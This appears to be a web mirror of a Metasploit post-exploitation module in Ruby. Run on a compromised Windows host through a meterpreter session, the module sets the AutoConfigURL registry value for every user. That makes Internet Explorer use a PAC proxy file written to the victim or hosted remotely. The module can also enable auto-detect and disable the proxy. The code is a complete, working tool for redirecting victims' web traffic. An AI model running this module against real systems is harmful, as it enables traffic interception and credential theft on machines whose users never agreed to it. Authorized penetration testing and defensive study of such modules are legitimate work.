Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/ie_proxypac.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Windows::Priv

8
  include Msf::Post::File

9
  include Msf::Post::Windows::Registry

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Windows Manage Proxy PAC File',

16
        'Description' => %q{

17
          This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC

18
          option, a PAC file will be created on the victim host. It's also possible to provide a

19
          remote PAC file (REMOTE_PAC option) by providing the full URL.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],

23
        'References' => [

24
          [ 'URL', 'https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1' ],

25
          [ 'URL', 'http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry' ]

26
        ],

27
        'Platform' => 'win',

28
        'SessionTypes' => [ 'meterpreter' ],

29
        'Compat' => {

30
          'Meterpreter' => {

31
            'Commands' => %w[

32
              stdapi_sys_config_getenv

33
            ]

34
          }

35
        },

36
        'Notes' => {

37
          'Stability' => [SERVICE_RESOURCE_LOSS],

38
          'SideEffects' => [CONFIG_CHANGES],

39
          'Reliability' => []

40
        }

41
      )

42
    )

43


44
    register_options(

45
      [

46
        OptPath.new('LOCAL_PAC', [false, 'Local PAC file.' ]),

47
        OptString.new('REMOTE_PAC', [false, 'Remote PAC file. (Ex: http://192.168.1.20/proxy.pac)' ]),

48
        OptBool.new('DISABLE_PROXY', [true, 'Disable the proxy server.', false]),

49
        OptBool.new('AUTO_DETECT', [true, 'Automatically detect settings.', false])

50
      ]

51
    )

52
  end

53


54
  def run

55
    if datastore['LOCAL_PAC'].blank? && datastore['REMOTE_PAC'].blank?

56
      fail_with(Failure::BadConfig, 'You must set a remote or local PAC file. Aborting...')

57
    end

58


59
    if datastore['REMOTE_PAC']

60
      @remote = true

61
      print_status('Setting automatic configuration script from a remote PAC file ...')

62
      res = enable_proxypac(datastore['REMOTE_PAC'])

63
    else

64
      @remote = false

65
      print_status('Setting automatic configuration script from local PAC file ...')

66
      pac_file = create_pac(datastore['LOCAL_PAC'])

67
      unless pac_file

68
        print_error('There were problems creating the PAC proxy file. Aborting...')

69
        return

70
      end

71
      res = enable_proxypac(pac_file)

72
    end

73
    unless res

74
      print_error('Error while setting an automatic configuration script. Aborting...')

75
      return

76
    end

77


78
    print_good('Automatic configuration script configured...')

79


80
    if datastore['AUTO_DETECT']

81
      print_status('Enabling Automatically Detect Settings...')

82
      unless auto_detect_on

83
        print_error('Failed to enable Automatically Detect Settings. Proceeding anyway...')

84
      end

85
    end

86


87
    if datastore['DISABLE_PROXY']

88
      print_status('Disabling the Proxy Server...')

89
      unless disable_proxy

90
        print_error('Failed to disable Proxy Server. Proceeding anyway...')

91
      end

92
    end

93
  end

94


95
  def create_pac(local_pac)

96
    pac_file = session.sys.config.getenv('APPDATA') << '\\' << "#{Rex::Text.rand_text_alpha(6..13)}.pac"

97


98
    unless ::File.exist?(local_pac)

99
      print_error('Local PAC file not found.')

100
      return false

101
    end

102


103
    conf_pac = ::File.open(local_pac, 'rb').read

104


105
    return false unless write_file(pac_file, conf_pac)

106


107
    print_status("PAC proxy configuration file written to #{pac_file}")

108
    return pac_file

109
  end

110


111
  def enable_proxypac(pac)

112
    proxy_pac_enabled = false

113


114
    registry_enumkeys('HKU').each do |k|

115
      next unless k.include?('S-1-5-21')

116
      next if k.include?('_Classes')

117


118
      key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings"

119
      value_auto = 'AutoConfigURL'

120
      file = @remote ? pac.to_s : "file://#{pac}"

121


122
      begin

123
        res = registry_setvaldata(key, value_auto, file, 'REG_SZ')

124
      rescue ::RuntimeError, Rex::TimeoutError

125
        next

126
      end

127


128
      if res.nil? # Rex::Post::Meterpreter::RequestError

129
        next

130
      end

131


132
      if change_connection(16, '05', key + '\\Connections')

133
        proxy_pac_enabled = true

134
      end

135
    end

136


137
    proxy_pac_enabled

138
  end

139


140
  def auto_detect_on

141
    auto_detect_enabled = false

142


143
    registry_enumkeys('HKU').each do |k|

144
      next unless k.include? 'S-1-5-21'

145
      next if k.include? '_Classes'

146


147
      key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings\\Connections"

148
      if change_connection(16, '0D', key)

149
        print_good('Automatically Detect Settings on.')

150
        auto_detect_enabled = true

151
      end

152
    end

153


154
    auto_detect_enabled

155
  end

156


157
  def disable_proxy

158
    value_enable = 'ProxyEnable'

159
    profile = false

160


161
    registry_enumkeys('HKU').each do |k|

162
      next unless k.include?('S-1-5-21')

163
      next if k.include?('_Classes')

164


165
      key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings"

166
      begin

167
        registry_setvaldata(key, value_enable, 0, 'REG_DWORD')

168
        profile = true

169
      rescue ::RuntimeError, Rex::TimeoutError

170
        next

171
      end

172
    end

173


174
    if profile

175
      print_good('Proxy disabled.')

176
      return true

177
    end

178


179
    return false

180
  end

181


182
  def change_connection(offset, value, key)

183
    value_default = 'DefaultConnectionSettings'

184
    begin

185
      value_con = registry_getvaldata(key, value_default)

186
      binary_data = value_con.unpack('H*')[0]

187
      binary_data[offset, 2] = value

188
      registry_setvaldata(key, value_default, ['%x' % binary_data.to_i(16)].pack('H*'), 'REG_BINARY')

189
    rescue ::RuntimeError, Rex::TimeoutError

190
      return false

191
    end

192


193
    return true

194
  end

195
end

196


197